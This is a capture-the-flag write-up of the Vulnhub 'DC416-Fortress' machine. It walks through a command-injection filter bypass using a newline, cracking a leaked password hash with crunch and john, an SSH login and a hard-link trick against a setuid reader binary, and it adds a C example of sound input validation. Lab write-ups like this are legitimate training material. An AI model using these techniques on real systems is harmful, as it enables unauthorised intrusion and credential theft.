[Vulnhub] DC416-Fortress

Let's try to breach this fortress!

nmap

nmap -v -sV 192.168.1.13

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2 (FreeBSD 20160310; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)
443/tcp open  ssl/http Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)

The nmap scan shows that port 443 is open. Visiting it in a browser brings up the website below, which states the engagement rules for this virtual machine.

[screenshot: website]

I start by launching a DirBuster scan against the website, which turns up /scanner.php.

[screenshot: dirbuster]

scanner.php, RCE anyone?

Now let's visit this page.

[screenshot: scanner]

The scanner.php page offers a function that runs a port scan for us. A web page that runs a scanner on user-supplied input smells like command injection, so let's try. The usual separators (|, &, ;) are filtered, so that is not the way in. Next I boot up Burp Suite, intercept the request and send it to Repeater to try more bypass methods.

[screenshot: burp]

Nice, the filter can be bypassed by putting the ls -lah command on a new line: the shell treats a newline as a command separator just like a semicolon, but the filter never checked for it. Now we have RCE, and the listing shows some interesting directories: k1ngd0m_k3yz and s1kr3t.
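The bug here is a denylist that covers the well-known separators but forgets that a newline is one too. As an added example, not code from the challenge (scanner.php's source is not shown in this writeup), the C below puts a filter of that kind beside an allowlist that only accepts a literal IPv4 address; the denylist contents and the function names are my assumptions.

```c
/* Added example: a character denylist of the kind scanner.php appears to
 * use versus an allowlist that accepts only an IPv4 literal.  The denylist
 * contents and function names are assumptions; the challenge's PHP source
 * is not shown in the writeup. */
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Weak check: rejects the "obvious" shell metacharacters.  /bin/sh also
 * treats a bare newline as a command separator, so a target such as
 * "192.168.1.13\nls -lah" is accepted, and the second line runs as its own
 * command once the string is handed to a shell. */
int denylist_allows(const char *target)
{
    return strpbrk(target, "|&;`$()<>") == NULL;
}

/* Strong check: the whole string must parse as exactly one IPv4 address.
 * Anything extra, a trailing newline included, makes inet_pton() return 0. */
int is_plain_ipv4(const char *target)
{
    struct in_addr addr;
    return inet_pton(AF_INET, target, &addr) == 1;
}

/* Shows the two checks disagreeing on a few constructed inputs. */
int main(void)
{
    const char *samples[] = {
        "192.168.1.13",            /* legitimate target */
        "192.168.1.13; id",        /* classic separator, caught by both */
        "192.168.1.13\nls -lah",   /* the newline trick from this writeup */
        "localhost",               /* a hostname, not an IPv4 literal */
    };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("sample %zu: denylist=%d allowlist=%d\n",
               i, denylist_allows(samples[i]), is_plain_ipv4(samples[i]));
    return 0;
}
```

Validation alone is only half of the fix: even an accepted target should be passed to the scanner as one argv element via execve(2) (or PHP's equivalent of an argument array), never interpolated into a shell command line.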
Running ls s1kr3t shows a flag.txt file.

cat s1kr3t/flag.txt

gives us the flag: FLAG{n0_one_br3aches_teh_f0rt}

Nice, two more to go. Let's see what else we can find on this box, starting with the k1ngd0m_k3yz directory.

cat k1ngd0m_k3yz/master

craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh

cat k1ngd0m_k3yz/passwd

craven:*:1002:1002:User &:/home/craven:/bin/sh

Now we have both the password hash (the "master" file, FreeBSD's master.passwd equivalent of a shadow file) and the passwd file. We can later feed them to unshadow and john; cracking that hash would most likely give us SSH access, since port 22 is open.

Let's look for other flags with the find command.

find / -name "flag.txt"

/usr/local/www/apache24/data/s1kr3t/flag.txt
/usr/home/vulnhub/flag.txt
/usr/home/craven/flag.txt

ls -lah /usr/home/craven

total 120
drwxr-xr-x  2 craven  craven   512B Nov  9 19:58 .
drwxr-xr-x  4 root    wheel    512B Nov  5 01:59 ..
-rw-r--r--  1 craven  craven   1.0K Nov  5 01:59 .cshrc
-rw-------  1 craven  craven     5B Nov  7 20:24 .gdb_history
-rw-r--r--  1 craven  craven    60B Nov  7 20:36 .gdbinit
-rw-r--r--  1 craven  craven   254B Nov  5 01:59 .login
-rw-r--r--  1 craven  craven   163B Nov  5 01:59 .login_conf
-rw-------  1 craven  craven   379B Nov  5 01:59 .mail_aliases
-rw-r--r--  1 craven  craven   336B Nov  5 01:59 .mailrc
-rw-r--r--  1 craven  craven   802B Nov  5 01:59 .profile
-rw-------  1 craven  craven   281B Nov  5 01:59 .rhosts
-rw-r--r--  1 craven  craven   978B Nov  5 01:59 .shrc
-r--------  1 craven  craven    46B Nov  6 01:30 flag.txt
-rw-r--r--  1 craven  craven   119B Nov  5 02:23 hint.txt
-rw-r--r--  1 craven  craven    77B Nov  5 02:20 reminders.txt

flag.txt is mode 0400 and owned by craven, so we need to become that user to read it. Let's look at the other two text files, hint.txt and reminders.txt.

cat /usr/home/craven/hint.txt

Keep forgetting my password, so I made myself a hint. Password is three digits followed by my pet's name and a symbol.

That pattern maps directly onto a crunch template: % is a digit and ^ is a symbol, so three digits, the pet's name, and one symbol gives a ten-character word list.

crunch 10 10 -t %%%qwerty^ > passlist.txt

Now unshadow comes in handy:

unshadow passwd shadow > crackthis

After that we can let john do its thing.

john --wordlist=/root/Desktop/passlist.txt crackthis

Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
931qwerty?       (craven)
1g 0:00:00:42 DONE (2016-12-18 22:44) 0.02369g/s 729.3p/s 729.3c/s 729.3C/s 930qwerty?..932qwerty>
Use the "--show" option to display all of the cracked passwords reliably
Session completed

So the password is 931qwerty? (the question mark is part of it).

ssh craven@192.168.1.13

$ pwd
/usr/home/craven
$ cat flag.txt
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

All right, on to the next flag. We already know where it is from the find output earlier.

$ pwd
/home/vulnhub

There is a setuid binary in this directory; running file on it gives:

$ file reader
reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped

Let's try feeding it flag.txt.

$ ./reader
./reader [file to read]
$ ./reader flag.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.

Of course that doesn't work, it would be too easy. Let's see what strings can find.

$ strings reader

[snippet]

%s [file to read]
Checking file type...
Symbolic links not allowed!
Checking if flag file...
flag
Nope. Can't let you have the flag.
Great! Printing file contents...
Win, here's your flag:

Hmm. The binary refuses symbolic links and appears to look for "flag" in the file name, so a link under another name is worth a try. A hard link (ln without -s) is not a symbolic link, so it may get past the first check as well. Let's try that.

$ cd /tmp
$ ln /home/vulnhub/flag.txt giefplix
$ cd /home/vulnhub/
$ ./reader /tmp/giefplix
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
FLAG{its_A_ph0t0_ph1ni5h}

Yay, we got the last flag! The fortress has been breached. Thanks to @Vulnhub, @superkojiman and the community for hosting challenges like this.

basebelongus

 
